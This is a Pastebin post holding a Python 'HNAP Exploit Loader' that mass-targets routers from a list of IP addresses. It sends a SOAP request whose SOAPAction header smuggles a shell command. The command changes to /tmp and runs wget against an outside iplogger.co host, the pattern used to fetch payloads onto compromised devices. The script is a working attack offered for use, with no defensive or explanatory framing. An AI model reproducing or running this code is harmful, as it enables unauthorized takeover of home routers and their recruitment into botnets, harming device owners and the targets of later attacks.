LNO_LiGhT

(UPnP) HNAP Exploit Loader | By; LiGhT

Jan 8th, 2018
4,451
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.23 KB | None | 0 0
  1. #! python !#
  2.  
  3. # HNAP Exploit | by; LiGhT
  4.  
  5. import threading, sys, time, random, socket, re, os, requests
  6.  
  7. ips = open(sys.argv[1], "r").readlines()
  8. payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>"
  9. headerlist = {'SOAPAction': 'http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp && wget http://iplogger.co/2qWq45 -O-`'}
  10.  
  11. class pump(threading.Thread):
  12.     def __init__ (self, ip):
  13.         threading.Thread.__init__(self)
  14.         self.ip = str(ip).rstrip('\n')
  15.     def run(self):
  16.         try:
  17.             url = "http://"+ip+"/HNAP1"
  18.             url = re.sub('\n', '', url)
  19.             r = requests.post(url, timeout=5, headers=headerlist, data=payload)
  20.             print "[HNAP] Payload Sent %s"%(url)
  21.         except:
  22.             pass
  23.  
  24. for ip in ips:
  25.     try:
  26.         n = pump(ip)
  27.         n.start()
  28.     except:
  29.         pass
Advertisement
Add Comment
Please, Sign In to add comment